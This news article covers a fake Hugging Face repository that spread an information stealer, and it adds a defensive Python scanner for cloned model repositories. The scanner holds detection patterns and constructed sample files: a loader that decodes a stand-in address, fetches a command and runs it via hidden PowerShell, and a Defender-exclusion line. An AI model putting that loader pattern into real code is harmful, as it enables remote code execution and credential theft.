The repository, named Open-OSS/privacy-filter, climbed to the top of Hugging Face’s trending list and recorded about 244,000 downloads before access was disabled. Its model card closely mirrored OpenAI’s legitimate Privacy Filter project, a tool designed to detect and redact personally identifiable information in unstructured text. That imitation gave the malicious page the appearance of a credible AI release at a time when developers are rapidly testing open-weight models for use in applications, data pipelines and enterprise systems.
Security analysis found that the repository included a Python file called loader.py and a Windows batch file, start.bat, which users were encouraged to run after cloning the project. The loader contained decoy AI-related code to appear benign, while its hidden function disabled SSL verification, decoded a remote address and fetched a command that was passed to PowerShell. That command then downloaded further components, escalated execution through Windows prompts, added exclusions to Microsoft Defender and launched a Rust-based information stealer.
The final payload targeted browser passwords, cookies, session tokens, encryption keys and browsing data from Chromium- and Gecko-based browsers. It also sought Discord tokens, cryptocurrency wallet data, wallet browser extensions, SSH keys, FTP and VPN credentials, FileZilla configuration files, local databases, system metadata and screenshots. The malware was built to compress and send stolen material to attacker-controlled infrastructure, making even systems without saved passwords vulnerable if active session cookies or OAuth tokens were present.
The campaign’s scale is difficult to measure because the download and like counts appear to have been inflated. Hundreds of likes were attached to the repository, with evidence suggesting many accounts were automated or low-quality. Even if the true number of compromised systems is far below the displayed download total, the incident shows how popularity signals on AI platforms can be manipulated to lower user suspicion. A repository that appears to be widely adopted can move rapidly through developer communities, particularly when it imitates a trusted brand and offers a topical privacy-related tool.
Hugging Face removed the repository after the abuse was reported. Additional repositories linked to the same infrastructure were also identified, including model names designed to resemble high-demand AI releases. Several were uploaded under another account and used similar loader behaviour, suggesting the operators were testing multiple lures rather than relying on a single project. The use of a remote JSON-based command source also allowed the attackers to alter the payload chain without modifying the Hugging Face repository itself.
The attack highlights a sharper risk for organisations that treat AI model hubs as simple download libraries. Modern AI repositories often contain more than model weights: they may include Python scripts, notebooks, configuration files, shell commands and dependency instructions. When such code is executed on workstations used by engineers or data scientists, it can gain access to cloud credentials, source-code repositories, internal APIs and production secrets. That makes AI supply-chain compromise potentially more damaging than a typical consumer malware infection.
Hugging Face already provides malware and unsafe-file scanning across repository contents, including checks triggered at commit time. The latest case shows that automated scanning remains only one layer of defence, particularly when attackers use multi-stage downloaders, public paste services, encoded commands and payloads retrieved after execution. Static scans can miss behaviour that depends on external infrastructure or delayed commands, while social signals such as trending rank may create misplaced trust.
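The loader behaviour described above and the limits of commit-time scanning suggest a practical habit: triage the executable files a cloned model repository ships beside its weights before anyone runs them. The script below is an added example, not code from the article, from Hugging Face or from the malicious repository. It looks for the traits the article attributes to the loader (disabled SSL verification, a remote address hidden in a base64 literal, a decode-then-fetch sequence handed to PowerShell, Microsoft Defender exclusions). The indicator names, regular expressions and the constructed loader.py and start.bat samples are assumptions for illustration; the command address uses the reserved .invalid domain and is not the real infrastructure.

```python
"""Pre-execution triage of a cloned model repository (added example).

Scans the text files shipped beside model weights (.py, .bat, .cmd, .ps1, .sh)
for loader traits described in the article. Matching is purely static, so a
payload fetched only after execution is invisible to it: a hit is a reason not
to run the file, but an empty report is not proof of safety.
"""
import base64
import json
import re
from pathlib import Path
from typing import Dict, List

# Heuristic indicators; the names and patterns are assumptions for this example.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "ssl_verification_disabled": re.compile(
        r"_create_unverified_context|verify\s*=\s*False|CERT_NONE"
        r"|ServerCertificateValidationCallback|-SkipCertificateCheck"
    ),
    "powershell_launch": re.compile(
        r"(?i)(subprocess|os\.system|Popen|start)[^\n]*powershell"
        r"|powershell(\.exe)?\s+[^\n]*-(enc|encodedcommand|w\s+hidden|ep\s+bypass)"
    ),
    "defender_exclusion": re.compile(r"(?i)Add-MpPreference\s+-Exclusion"),
    # A decode call followed within 200 characters by a network fetch.
    "runtime_decode_then_fetch": re.compile(
        r"(?i)(b64decode|frombase64string|fromhex)[\s\S]{0,200}"
        r"(urlopen|requests\.get|iwr|invoke-webrequest|downloadstring|curl)"
    ),
}

SCAN_SUFFIXES = {".py", ".bat", ".cmd", ".ps1", ".sh"}


def decoded_urls(text: str) -> List[str]:
    """Return http(s) URLs found inside base64 literals in the text."""
    found: List[str] = []
    for token in re.findall(r"[A-Za-z0-9+/=]{16,}", text):
        try:
            plain = base64.b64decode(token, validate=True).decode("ascii")
        except Exception:  # not valid base64, or not printable ASCII
            continue
        found.extend(re.findall(r"https?://[^\s'\"]+", plain))
    return found


def scan_text(text: str) -> Dict[str, List[str]]:
    """Map each triggered indicator to the matched snippets (empty if clean)."""
    hits = {
        name: [m.group(0).strip()[:80] for m in pat.finditer(text)]
        for name, pat in INDICATORS.items()
    }
    hits = {name: matches for name, matches in hits.items() if matches}
    urls = decoded_urls(text)
    if urls:
        hits["base64_encoded_url"] = urls
    return hits


def scan_repo(root: Path) -> Dict[str, Dict[str, List[str]]]:
    """Scan every script-like file under root; report only files with hits."""
    report: Dict[str, Dict[str, List[str]]] = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report


# Constructed samples shaped like the behaviour the article describes. They are
# not the real files; the address is the reserved .invalid domain.
ENCODED_ADDRESS = base64.b64encode(b"https://c2.example.invalid/cmd.json").decode()
SAMPLE_LOADER = f'''
import ssl, base64, subprocess, urllib.request
from transformers import AutoTokenizer  # decoy: looks like model-loading code
tok = AutoTokenizer.from_pretrained("bert-base-uncased")
ssl._create_default_https_context = ssl._create_unverified_context
src = base64.b64decode("{ENCODED_ADDRESS}").decode()
cmd = urllib.request.urlopen(src).read().decode()
subprocess.run(["powershell", "-w", "hidden", "-ep", "bypass", "-c", cmd])
'''
SAMPLE_BAT = r'''
@echo off
powershell -Command "Add-MpPreference -ExclusionPath %USERPROFILE%"
'''


def demo() -> Dict[str, Dict[str, List[str]]]:
    """Write the constructed samples into a temporary 'clone' and scan it."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "loader.py").write_text(SAMPLE_LOADER)
        (root / "start.bat").write_text(SAMPLE_BAT)
        (root / "README.md").write_text("# Privacy filter\nDetects and redacts PII.\n")
        (root / "model.safetensors").write_bytes(b"\x00" * 16)
        return scan_repo(root)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it against a real clone with `scan_repo(Path("path/to/clone"))`. The report for the constructed clone flags loader.py on four indicators, including the decoded address, and start.bat on the Defender exclusion, while the README and the weights file produce nothing. What the script cannot see is the command the loader would have fetched at runtime, which is exactly the stage a commit-time scan also misses.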
Follow Arabian Post